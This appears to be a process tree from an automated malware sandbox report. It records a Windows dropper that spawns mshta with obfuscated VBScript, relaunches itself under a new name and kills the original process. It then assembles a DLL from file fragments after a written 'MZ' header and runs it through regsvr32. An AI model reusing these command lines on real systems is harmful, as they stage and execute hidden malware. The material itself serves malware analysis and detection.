C:\Users\Admin\AppData\Local\Temp\E0B9.exeC:\Users\Admin\AppData\Local\Temp\E0B9.exe1⤵
- Executes dropped EXE
PID:2840
-
C:\Users\Admin\AppData\Local\Temp\E230.exeC:\Users\Admin\AppData\Local\Temp\E230.exe1⤵
- Executes dropped EXE
PID:2936 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCripT: CLOsE ( cReATEoBJeCT ("wSCRipT.shEll" ). RUN ( "cmd /C tYPE ""C:\Users\Admin\AppData\Local\Temp\E230.exe"" > 0~NM~WIL.eXe && sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if """" == """" for %D iN ( ""C:\Users\Admin\AppData\Local\Temp\E230.exe"" ) do taskkill -F /IM ""%~NXD"" " , 0 , TRUE ) )2⤵PID:1288
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\E230.exe" > 0~NM~WIL.eXe &&sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if "" == "" for %D iN ( "C:\Users\Admin\AppData\Local\Temp\E230.exe" ) do taskkill -F /IM "%~NXD"3⤵
- Loads dropped DLL
PID:2544 -
C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe0~nM~WIl.eXE /pwIz2i2S0CJRBKmE44⤵
- Executes dropped EXE
PID:2632 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCripT: CLOsE ( cReATEoBJeCT ("wSCRipT.shEll" ). RUN ( "cmd /C tYPE ""C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe"" > 0~NM~WIL.eXe && sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if ""/pwIz2i2S0CJRBKmE4 "" == """" for %D iN ( ""C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe"" ) do taskkill -F /IM ""%~NXD"" " , 0 , TRUE ) )5⤵PID:2332
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe" > 0~NM~WIL.eXe &&sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if "/pwIz2i2S0CJRBKmE4 " == "" for %D iN ( "C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe" ) do taskkill -F /IM "%~NXD"6⤵PID:960
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRiPT: CLosE ( cREATEObjECt ( "WsCrIpT.ShElL" ). RUn ( "CmD /q /C EchO 90tQ%daTe%PSA> YAEF9Fv.MI & ECHo | seT /p = ""MZ"" > s1S8NN.3F & CoPY /Y /B S1S8Nn.3f + RVPZHO1.qP + 4ZlR0MZ.q_1 + 1LIRC.u + SWnWL.H +YAEF9FV.MI XN9IOnS.vc &sTART regsvr32.exe -s XN9IONS.VC /u " , 0 , TRue) )5⤵PID:1816
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C EchO 90tQÚTe%PSA> YAEF9Fv.MI & ECHo | seT /p = "MZ" >s1S8NN.3F & CoPY /Y /B S1S8Nn.3f + RVPZHO1.qP + 4ZlR0MZ.q_1 + 1LIRC.u +SWnWL.H +YAEF9FV.MI XN9IOnS.vc &sTART regsvr32.exe -s XN9IONS.VC /u6⤵PID:2524
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHo "7⤵PID:2996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>s1S8NN.3F"7⤵PID:1484
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe -s XN9IONS.VC /u7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:856
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /IM "E230.exe"4⤵
- Kills process with taskkill
PID:2464
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E618.exeC:\Users\Admin\AppData\Local\Temp\E618.exe1⤵
- Executes dropped EXE
PID:2488